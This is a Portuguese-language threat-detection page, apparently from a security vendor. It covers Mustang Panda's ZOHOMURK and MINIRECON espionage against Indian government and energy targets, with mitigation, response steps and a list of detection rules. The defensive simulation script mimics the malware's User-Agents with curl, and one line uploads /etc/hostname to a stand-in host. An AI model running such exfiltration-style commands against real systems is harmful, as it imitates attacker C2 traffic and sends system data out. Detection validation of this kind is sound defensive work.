Mustang Panda Usa ZOHOMURK e MINIRECON contra os Setores Governamental e de Energia da Índia
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Mustang Panda está realizando operações de espionagem visando os setores do governo e de hidrelétrica da Índia. O grupo está usando um kit de ferramentas de malware atualizado que inclui SHARDLOADER, MINIRECON e ZOHOMURK. Uma de suas técnicas notáveis é o abuso do Zoho WorkDrive para comando e controle e exfiltração de dados.
Investigação
A Acronis TRU identificou duas campanhas paralelas que usaram iscas de spear-phishing temáticas sobre a cooperação Índia-Taiwan. Os pesquisadores encontraram carregamento de DLL através de binários legítimos do Solid PDF Creator e analisaram os novos implantes ZOHOMURK e MINIRECON. A investigação também foi conduzida em coordenação com o CERT-In para apoiar ações defensivas.
Mitigação
As organizações devem monitorar atividades incomuns envolvendo plataformas de nuvem, especialmente o uso não autorizado do Zoho WorkDrive. As soluções EDR e XDR devem ser ajustadas para detectar carregamento de DLL e persistência suspeita baseada em registro. Visibilidade em processos não navegadores fazendo conexões HTTPS ou WebSocket para serviços de nuvem também é essencial.
Resposta
Se essa atividade for detectada, os sistemas afetados devem ser isolados imediatamente para interromper mais exfiltração por meio das APIs da nuvem. Os investigadores devem realizar análise forense nos caminhos de estágio, como C:ProgramDataIDMlogs or %LOCALAPPDATA%MicrosoftVaultCache. As chaves de execução de registro e as tarefas agendadas devem ser analisadas quanto a persistência não autorizada.
Fluxo de Ataque
Detecções
Tarefa Agendada Suspeita (via auditoria)
Ver
Pontos Possíveis de Persistência [ASEPs – Software/NTUSER Hive] (via evento_registro)
Ver
Arquivos Suspeitos no Perfil Público do Usuário (via evento_arquivo)
Ver
Detecção de Comunicação C2 do Mustang Panda MINIRECON e ZOHOMURK [Conexão de Rede do Windows]
Ver
Detecção de Comando e Controle do Mustang Panda ZOHOMURK [Proxy]
Ver
Detecção de Mecanismos de Persistência do Mustang Panda em Ataques no Setor Indiano [Evento de Registro do Windows]
Ver
Execução de Simulação
Pré-requisito: O Check de Pré-voo de Telemetria & Baseline deve ter passado.
Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a um diagnóstico errado.
-
Narrativa do Ataque & Comandos: O adversário estabeleceu com sucesso um ponto de apoio e está tentando iniciar comunicações de Comando e Controle (C2). Para se fazer passar por tráfego comercial legítimo, o implante ZOHOMURK tenta se comunicar com seu controlador imitando chamadas de API do Zoho WorkDrive. O atacante usa uma string de User-Agent específica, hardcoded (
Zoho Client/1.0) para passar por certos filtros de rede, na esperança de se misturar com o tráfego legítimo de produtividade em nuvem. Esta ação gerará uma entrada de log de proxy contendo o User-Agent alvo, acionando assim a regra de detecção. -
Script de Teste de Regressão:
#!/bin/bash # Simulação de C2 ZOHOMURK via falsificação de User-Agent # Alvo 1: Imitando cliente Zoho echo "[+] Simulando ZOHOMURK: Zoho Client/1.0" curl -A "Zoho Client/1.0" http://example.com/api/v1/sync # Alvo 2: Imitando IPFetcher echo "[+] Simulando ZOHOMURK: IPFetcher/1.0" curl -A "IPFetcher/1.0" http://example.com/checkip # Alvo 3: Imitando Multipart POST User-Agent echo "[+] Simulando ZOHOMURK: Multipart POST" curl -X POST -A "Multipart POST" -F "data=@/etc/hostname" http://example.com/upload -
Comandos de Limpeza:
# Nenhum artefato persistente é criado no sistema por esta simulação baseada em rede. # Apenas assegure-se de que nenhum processo curl em segundo plano esteja em execução. pkill curl